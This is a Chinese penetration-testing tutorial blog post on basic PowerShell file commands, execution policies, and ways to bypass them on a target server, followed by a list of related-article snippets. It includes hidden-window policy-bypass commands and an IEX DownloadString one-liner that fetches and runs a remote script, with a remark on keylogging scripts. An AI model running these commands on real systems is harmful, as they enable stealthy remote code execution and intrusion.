渗透之——PowerShell基本命令和绕过权限执行
转载请注明出处:https://blog.csdn.net/l1028386804/article/details/86029412
一、基本命令
以文件操作为例
1.新建目录
New-Item whitecellclub-ItemType Directory
2.新建文件
New-Item light.txt-ItemType File
3.删除目录
Remove-Item whitecellclub
4.显示文件内容
Get-Content test.txt
5.设置文本内容
Set-Content test.txt-Value"Hello World!"
6.追加内容
Add-Content light.txt-Value"i love you"
7.清除内容
Clear-Content test.txt
二、执行策略
获取执行策略
Get-ExecutionPolicy
策略分以下几种:
- Restricted: 脚本不能执行(默认)
- RemoteSigned: 本地创建的脚本可以运行,但从网上下载的脚本不能运行(拥有数字证书签名的除外)。
- AllSigned: 仅当脚本由受信任的发布者签名时才能运行。
- Unrestricted: 允许所有的script运行
可以使用如下命令格式设置PowerShell的执行策略
Set-ExecutionPolicy <Policy name>
三、绕过策略来执行脚本
如果要运行PowerShell脚本程序,必须用管理员权限将Restricted策略改成Unrestricted,所以,在渗透时,需要采用一些方法绕过策略来执行脚本
1.绕过本地权限执行
上传xxx.ps1到目标服务器,在CMD环境下,在目标服务器本地执行该脚本
PowerShell.exe-ExecutionPolicy Bypass-File xxx.ps1
2.本地隐藏绕过权限执行脚本
PowerShell.exe-ExecutionPolicy Bypass-WindowStyle Hidden-NoLogo-NonInteractive-NoProfile-File xxx.ps1
3.用IEX下载远程PS1脚本绕过权限执行
PowerShell.exe-ExecutionPolicy Bypass-WindowStyle Hidden-NoProfile-Nonl IEX (New-ObjectNet.WebClient).DownloadString("xxx.ps1");[Parameters]
以上命令的参数说明:
- ExecutionPolicy Bypass : 绕过执行安全策略,这个参数非常重要,在默认情况下,PowerShell的安全策略规定了PowerShell不允许运行命令和文件。通过设置这个参数,可以绕过任意一个安全规则。在渗透测试中,基本每一次运行PowerShell脚本时都要使用这个参数。
- WindowStyle Hidden : 隐藏窗口
- NoLogo : 启动不显示版权标志的PowerShell
- NonInteractive (-Nonl) : 非交互模式,PowerShell不为用户提供交互的提示
- NoProfile (-Nop): PowerShell控制台不加载当前用户的配置文件
- Noexit : 执行后不退出Shell。这在使用键盘记录等脚本时非常重要。
- PowerShell脚本在默认情况下无法直接运行,这时就可以使用上述三种方法绕过安全策略,运行PowerShell脚本。
渗透之——PowerShell基本命令和绕过权限执行相关推荐
- Fortinet 修复严重漏洞,可导致未认证黑客以最高权限执行任意代码
聚焦源代码安全,网罗国内外最新资讯! 编译:奇安信代码卫士 Fortinet 更新 FortiManager 和 FortiAnalyzer 网络管理解决方案,修复可导致攻击者以最高权限执行任意代码 ...
- 权限执行[Android开发常见问题-4] RunTime.exec()如何以root权限执行多条指令?
每日一贴,今天的内容关键字为权限执行 RunTime.exec()这个接口可以说是给我们开发者供给了一个很好的直观操纵底层操纵系统的机遇,但是这个接口的使用还有很多需要注意的问题.由于要完全的分析这个 ...
- 队列不存在,或您没有足够的权限执行该操作-另一种原因
今天在虚拟机上调程序的时候,将消息队列的地址配置成了127.0.0.1,结果总是报下面的错误: [2011-04-19 10:53:53,331 ERROR StartProcess] -- Ex ...
- SqlPackage.exe –使用bacpac和PowerShell或Batch技术自动执行SQL Server数据库还原
Data is the key to your organization's future, but if it's outdated, irrelevant, or hidden then it's ...
- php怎么获取权限操作 shell,利用php利用root权限执行shell脚本必须进行以下几个步骤...
这几天弄的东西涉及到php利用shell脚本与Linux的交互,我们知道利用php运行脚本来访问Linux是以Apach的身份来执行的,因此它自己能够所做的事情很少的,因为没有足够的权限,这里就涉及到 ...
- 服务器要删除文件访问被拒绝,删除文件提示:文件夹访问被拒绝 需要来自administrator权限执行操作...
有时候我们在删除一些系统重要文件,或者被保护的文件的时候,会出现对话框,提示我们您需要来自administrator权限才能对此文件夹进行更改,这是什么原因导致的?今天小编就为大家分析下解决办法. 方 ...
- win10 你没有足够的权限执行此操作。
win10 你没有足够的权限执行此操作. CreateTime--2018年4月21日08:21:31 Author:Marydon 鼠标悬浮到windows图标上,右键-->选择:以命令提示符 ...
- Windows和服务器文件互传之scp命令,ssh通道连接服务器、linux获取管理员权限执行杀进程等常用linux命令
一.scp命令 前提条件:本地和服务端网络通信正常,可以通过ping命令校验查看 ping 10.29.133.111 场景:把当前Windows系统桌面的 123.txt 文件上传至 10.29.1 ...
- 安装天翼掌上大学,显示用户权限不足,请使用管理员权限执行安装程序!安装退出。
安装天翼掌上大学,显示用户权限不足,请使用管理员权限执行安装程序!安装退出. 刚下载完掌上大学后,很多小伙伴会发现无法安装,显示用户权限不足,要用管理员权限. 解决方法: 只要把下载好的文件拖到桌面上 ...
最新文章
- python接口测试类型_python 接口测试字符类型转换
- widget模式弄不出来_【春天文化】互联网时代的教育模式培养精英
- Shell——常用工具(cut、sed、awk、sort)
- js判断字符串包含某个字符_python str 字符串的逻辑判断用法
- Java多线程(6)--Callable接口创建线程
- 【字典树】添加和查找单词
- 火山PC_火山安卓_免安装解压即用版本
- java mencoder_java 用ffmpeg和mencoder进行视频转码
- 十进制转格雷码 c语言,C语言输出格雷码
- 计算机各种办公软件都很卡,电脑中打开office2016办公软件很卡的解决方法
- 陶哲轩实分析 3.4
- BFC(块级格式化上下文)
- 【爬虫BUG】‘list‘ object has no attribute ‘text‘
- java8使用Comparator.comparing进行排序
- Linux获取系统UUID
- 红旗linux试题,redflag认证部分试题
- 淘宝要社交:改变买家购买方式 取消商品排名(转载)
- 一种基于改进的LeNet-5 CNN模型通过图像监控雾度的方法
- CKA证书题库-总结
- 微信小程序蓝牙连接错误分析及解决